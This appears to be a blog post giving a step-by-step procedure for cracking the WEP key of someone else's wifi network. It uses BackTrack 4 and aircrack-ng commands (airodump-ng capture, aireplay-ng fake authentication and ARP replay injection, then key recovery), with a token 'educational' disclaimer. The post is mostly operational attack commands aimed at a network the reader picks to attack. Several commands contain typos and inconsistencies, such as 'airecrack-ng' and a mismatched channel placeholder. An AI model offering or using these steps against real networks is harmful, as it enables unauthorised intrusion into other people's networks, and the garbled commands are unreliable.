Here is a 10  step procedure showing how to hack into a wifi network by cracking the  WEP key.
(almost  everywhere, WEP cracking on a wireless network not owned by the  attacker is considered as a crime, so be careful what you do. This is an  educational Document)
1.  Boot Live CD/DVD of BackTrack 4. After it boots, type in "startx" to  start GUI
2.  Open new Konsole (backtrack's terminal).
3.  Type, not using qoutes, "airodump-ng wlan0". Now find the network you  want to attack. Copy the BSSID and the channel (write down on piece of  paper and keep handy)
4.  Open new Konsole, type "airodump-ng -w wep -c 11 --bssid  00:24:b2:80:d7:3c wlan0"   **X & 00:24:b2:80:d7:3c are examples of  the channel and bssid you should have copied**
5.  You are now fixed on to the network you want to attack.
6.  Close the first Konsole, open a new Konsole and type "aireplay-ng -1 0  -a 00:24:b2:80:d7:3c wlan0"  **00:24:b2:80:d7:3c is an example as well**
7.  Open another new Konsole, type "aireplay-ng -3 -b 00:24:b2:80:d7:3c  wlan0"  **00:24:b2:80:d7:3c example"
8.  Go to first Konsole, wait for the Data to reach to 30,000; go to 3rd  Konsole, hit CNTL + C, then type in "dir", hit enter
9.  Type "airecrack-ng wep.01.cap", hit enter.
10.  Let it run its course, should only take a few moments. Once key is  found, it will show up with semi-colons in it. Take out the semi-colons,  and this will be the key. (Example of key; 53:06:66:51:50, so it will  be 5306665150)
Where  to get back track 4 from:  http://www.backtrack-linux.org/
 20:30
20:30
 LazyHacker
LazyHacker
 
 Posted in:
 Posted in:  
 
 
 
 
 

0 comments:
Post a Comment